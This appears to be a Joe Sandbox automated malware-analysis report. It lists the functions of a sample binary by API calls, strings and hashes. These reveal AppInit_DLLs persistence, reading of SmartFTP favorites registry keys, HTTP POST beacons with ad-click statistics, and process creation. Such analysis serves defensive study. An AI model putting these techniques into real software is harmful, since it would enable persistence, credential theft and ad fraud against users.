Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
API String ID: 3100629401-2436734164
Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

Function 0040253C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113sleepprocessfileCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

_memset.LIBCMT ref: 004025DA
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D

Strings

none, xrefs: 00402614

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
String ID: none
API String ID: 2353737338-2140143823
Opcode ID: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
Opcode Fuzzy Hash: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE

Function 004094B6 Relevance: 10.6, APIs: 7, Instructions: 81COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004094E6

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84

Function 0040A245 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A26B
SysAllocString.OLEAUT32(?), ref: 0040A28E
SysAllocString.OLEAUT32(?), ref: 0040A296
SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
SysFreeString.OLEAUT32(?), ref: 0040A2CF

Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009

Strings

J(@, xrefs: 0040A29E, 0040A2A1

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
String ID: J(@
API String ID: 3143865713-2848800318
Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4

Function 0040782A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60filetimeCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
CloseHandle.KERNEL32(00000000), ref: 00407880
GetTickCount.KERNEL32 ref: 00407888

Strings

UniqueNum, xrefs: 00407836

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: File$CloseCountCreateHandleModuleNameTickTime
String ID: UniqueNum
API String ID: 1853814767-3816303966
Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

Function 00407E2B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 54fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74

Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

d, xrefs: 00407E7E
hOAd, xrefs: 00407E91
x, xrefs: 00407E86
UniqueNum, xrefs: 00407E38

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: File$CreateModuleNamePointerRead
String ID: UniqueNum$d$hOAd$x
API String ID: 1528952607-1018652783
Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

Function 00408604 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
GetLastError.KERNEL32(?,00000000), ref: 0040864A

Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687

Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00408619, 0040861E, 00408676
C:\WINDOWS\system32\gbdwpbm.dll, xrefs: 00408682
AppInit_DLLs, xrefs: 00408639, 00408671

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
API String ID: 4026185228-3265104503
Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD

Function 00409A99 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00409B00
SysAllocString.OLEAUT32(?), ref: 00409B0E

Strings

</title>, xrefs: 00409AA7
<title>, xrefs: 00409AAC
</url>, xrefs: 00409ACC
<url>, xrefs: 00409AD1

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: AllocString
String ID: </title>$</url>$<title>$<url>
API String ID: 2525500382-2286408829
Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4

Function 0040A8F9 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 161sleepmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
Sleep.KERNEL32(00002710), ref: 0040AAC1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
HeapFree.KERNEL32(00000000), ref: 0040AAF0

Strings

0, xrefs: 0040AA5B
jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: HeapSleep$AttemptConnectFreeInternetProcess
String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
API String ID: 3713053250-1268808612
Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA

Function 004083C4 Relevance: 9.1, APIs: 6, Instructions: 61filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
CloseHandle.KERNEL32(?), ref: 00408452

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28

Function 00409DF4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00

Strings

POST, xrefs: 00409EBD

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: HttpInternetRequest$ConnectFileOpenReadSend
String ID: POST
API String ID: 961146071-1814004025
Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8

Function 00405136 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB

Strings

SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
personal favorites, xrefs: 00405176
folder, xrefs: 00405184
SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: EnvironmentExpandOpenStrings
String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
API String ID: 3923277744-821743658
Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9

Function 0040A0B5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040A0C0
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3

Strings

AtlAxWin, xrefs: 0040A0ED
Shell.Explorer, xrefs: 0040A0E8

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CreateHandleInitializeModuleWindow
String ID: AtlAxWin$Shell.Explorer
API String ID: 950422046-1300462704
Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65

Function 004072ED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
__aulldiv.LIBCMT ref: 00407359

Strings

n(@, xrefs: 0040734C, 00407357

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Time$System$File$__aulldiv
String ID: n(@
API String ID: 3735792614-2525614082
Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9

Function 0040AB7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
CharLowerW.USER32(?), ref: 0040ABA0
GetCommandLineW.KERNEL32 ref: 0040ABC0

Strings

/updatefile3, xrefs: 0040ABC6
netprotdrvss.exe, xrefs: 0040ABA6

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CharCommandFileLineLowerModuleName
String ID: /updatefile3$netprotdrvss.exe
API String ID: 3118597399-3449771660
Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D

Function 00409FB1 Relevance: 7.6, APIs: 5, Instructions: 53windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00409FCE
GetTickCount.KERNEL32 ref: 00409FDE
Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
DispatchMessageW.USER32(?), ref: 0040A009

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CountMessageTick$DispatchPeekSleep
String ID:
API String ID: 4159783438-0
Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A

Function 00409F2B Relevance: 7.5, APIs: 5, Instructions: 40windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00409F5B
GetTickCount.KERNEL32 ref: 00409F5F
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
DispatchMessageW.USER32(?), ref: 00409F80
Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CountMessageTick$DispatchPeekSleep
String ID:
API String ID: 4159783438-0
Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58

Function 00408692 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551

Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D

CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
SysFreeString.OLEAUT32(?), ref: 0040875A

Strings

http://, xrefs: 00408711
+@, xrefs: 004086A0

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
String ID: http://$+@
API String ID: 147727044-3628382792
Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99

